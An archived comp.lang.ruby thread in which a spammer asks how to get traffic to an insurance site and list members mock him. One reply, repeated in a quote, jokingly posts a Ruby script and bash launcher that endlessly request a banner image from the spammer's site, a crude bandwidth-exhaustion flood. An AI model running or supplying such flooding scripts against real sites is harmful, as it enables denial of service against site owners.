[lnkForumImage]
TotalShareware - Download Free Software

Confronta i prezzi di migliaia di prodotti.
Asp Forum
 Home | Login | Register | Search 


 

Forums >

comp.lang.ruby

How to promote my site?

Travis Kevindy0223

4/29/2008 1:57:00 AM

I have a site on insurance: http://www.carsinsuranc...
However, no traffic, Does anyone can tell me how to get traffic?
--
Posted via http://www.ruby-....

7 Answers

Phillip Gawlowski

4/29/2008 2:03:00 AM

0

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Travis Kevindy0223 wrote:
| I have a site on insurance: http://www.carsinsuranc...
| However, no traffic, Does anyone can tell me how to get traffic?

Not by posting here, you won't.

- --
Phillip Gawlowski
Twitter: twitter.com/cynicalryan

:zombie: [UNIX] n. A process that has died but has not yet
~ relinquished its process table slot (because the parent process
~ hasn't executed a `wait(2)' for it yet). These can be seen in
~ `ps(1)' listings occasionally. Compare {orphan}.
~ -- The AI Hackers Dictionary
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail....

iEYEARECAAYFAkgWgbIACgkQbtAgaoJTgL+p0gCfX/KJBRhbRHUUmsZYTBI0WXls
qpcAoJRZhqjnpGg4kTmefCehFuvhmBg6
=7/bG
-----END PGP SIGNATURE-----

M. Edward (Ed) Borasky

4/29/2008 2:19:00 AM

0

Travis Kevindy0223 wrote:
> I have a site on insurance: http://www.carsinsuranc...
> However, no traffic, Does anyone can tell me how to get traffic?
My car insurance goes up if I spend too much time in traffic.

Joel VanderWerf

4/29/2008 2:27:00 AM

0

Travis Kevindy0223 wrote:
> I have a site on insurance: http://www.e...
> However, no traffic, Does anyone can tell me how to get traffic?

Why don't you try posting to every newsgroup in the worl... oh.

--
vjoel : Joel VanderWerf : path berkeley edu : 510 665 3407

Kevin Brown

4/29/2008 7:49:00 PM

0

Kevindy0223,

Is that response consistent with Ruby Way? He asked nicely. =20
I for one intend to drive a lot of traffic to his site:


# ------------ bandwidtheater.rb --------------


#!/usr/bin/ruby
require 'net/http'

url =3D =
URI.parse('http://www.carsinsuranc.../images/banners/shop...
jpg')
req =3D Net::HTTP::Get.new(url.path)
while(true)
res =3D Net::HTTP.start(url.host, url.port) {|http|
http.request(req)
print "."
$stdout.flush
}
end



# ------------ eaterspawn.sh --------------

#!/bin/bash
for ((i=3D0;i<=3D10;i+=3D1)); do
bandwidtheater.rb &
done


# ------- stopping ---------------


kill -9 `ps -e | grep bandwidtheater | awk '{print $1}' | xargs ` =20






-----Original Message-----
From: Phillip Gawlowski [mailto:cmdjackryan@googlemail.com]
Sent: Mon 4/28/2008 10:02 PM
To: ruby-talk ML
Subject: Re: How to promote my site?
=20
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Travis Kevindy0223 wrote:
| I have a site on insurance: http://www.carsinsuranc...
| However, no traffic, Does anyone can tell me how to get traffic?

Not by posting here, you won't.

- --
Phillip Gawlowski
Twitter: twitter.com/cynicalryan

:zombie: [UNIX] n. A process that has died but has not yet
~ relinquished its process table slot (because the parent process
~ hasn't executed a `wait(2)' for it yet). These can be seen in
~ `ps(1)' listings occasionally. Compare {orphan}.
~ -- The AI Hackers Dictionary
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail....

iEYEARECAAYFAkgWgbIACgkQbtAgaoJTgL+p0gCfX/KJBRhbRHUUmsZYTBI0WXls
qpcAoJRZhqjnpGg4kTmefCehFuvhmBg6
=3D7/bG
-----END PGP SIGNATURE-----



Kevin Brown

4/29/2008 7:52:00 PM

0

Sorry, I meant to address this to Phillip Gawlowski (rather than the =
spammer)


-----Original Message-----
From: Kevin Brown [mailto:Kevin.Brown@air2web.com]
Sent: Tue 4/29/2008 3:48 PM
To: ruby-talk ML
Subject: Re: How to promote my site?
=20
Kevindy0223,

Is that response consistent with Ruby Way? He asked nicely. =20
I for one intend to drive a lot of traffic to his site:


Phillip Gawlowski

4/29/2008 10:26:00 PM

0

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Kevin Brown wrote:
|
| Is that response consistent with Ruby Way? He asked nicely.
| I for one intend to drive a lot of traffic to his site:

Short, concise, to the point with a hint of syntactic sugar. :P

Also, I left him/her alive, didn't I? ;)

- --
Phillip Gawlowski
Twitter: twitter.com/cynicalryan
Blog: http://justarubyist.bl...

~ "I suppose if we couldn't laugh at things that don't make sense, we
couldn't react to a lot of life." -Hobbes
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail....

iEYEARECAAYFAkgXoEcACgkQbtAgaoJTgL8JawCfUhm1atg2pDapERYosnhyCw/n
198An1d8Y3IeBlthAYj6p5Tcp22zMEf0
=3mlz
-----END PGP SIGNATURE-----

M. Edward (Ed) Borasky

4/30/2008 2:29:00 AM

0

Kevin Brown wrote:
> Kevindy0223,
>
> Is that response consistent with Ruby Way? He asked nicely.
> I for one intend to drive a lot of traffic to his site:
>
>
> # ------------ bandwidtheater.rb --------------
>
>
> #!/usr/bin/ruby
> require 'net/http'
>
> url = URI.parse('http://www.carsinsuranc.../images/banners/shop-ad-book...)
> req = Net::HTTP::Get.new(url.path)
> while(true)
> res = Net::HTTP.start(url.host, url.port) {|http|
> http.request(req)
> print "."
> $stdout.flush
> }
> end
>
>
>
> # ------------ eaterspawn.sh --------------
>
> #!/bin/bash
> for ((i=0;i<=10;i+=1)); do
> bandwidtheater.rb &
> done
>
>
> # ------- stopping ---------------
>
>
> kill -9 `ps -e | grep bandwidtheater | awk '{print $1}' | xargs `
>
>
>
>
>
>
> -----Original Message-----
> From: Phillip Gawlowski [mailto:cmdjackryan@googlemail.com]
> Sent: Mon 4/28/2008 10:02 PM
> To: ruby-talk ML
> Subject: Re: How to promote my site?
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Travis Kevindy0223 wrote:
> | I have a site on insurance: http://www.carsinsuranc...
> | However, no traffic, Does anyone can tell me how to get traffic?
>
> Not by posting here, you won't.
>
> - --
> Phillip Gawlowski
> Twitter: twitter.com/cynicalryan
>
> :zombie: [UNIX] n. A process that has died but has not yet
> ~ relinquished its process table slot (because the parent process
> ~ hasn't executed a `wait(2)' for it yet). These can be seen in
> ~ `ps(1)' listings occasionally. Compare {orphan}.
> ~ -- The AI Hackers Dictionary
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.8 (MingW32)
> Comment: Using GnuPG with Mozilla - http://enigmail....
>
> iEYEARECAAYFAkgWgbIACgkQbtAgaoJTgL+p0gCfX/KJBRhbRHUUmsZYTBI0WXls
> qpcAoJRZhqjnpGg4kTmefCehFuvhmBg6
> =7/bG
> -----END PGP SIGNATURE-----
>
>
>

A word of caution -- if you use scripts to artificially inflate your
traffic, bad things can happen to you, like getting put on blacklists.